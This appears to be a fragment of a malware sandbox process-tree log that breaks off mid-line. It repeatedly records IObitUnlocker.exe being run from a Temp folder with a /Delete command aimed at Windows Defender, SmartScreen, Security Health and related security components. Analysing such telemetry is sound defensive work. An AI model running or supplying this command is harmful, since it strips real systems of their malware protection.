                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:12172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:12192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:12284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:12128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 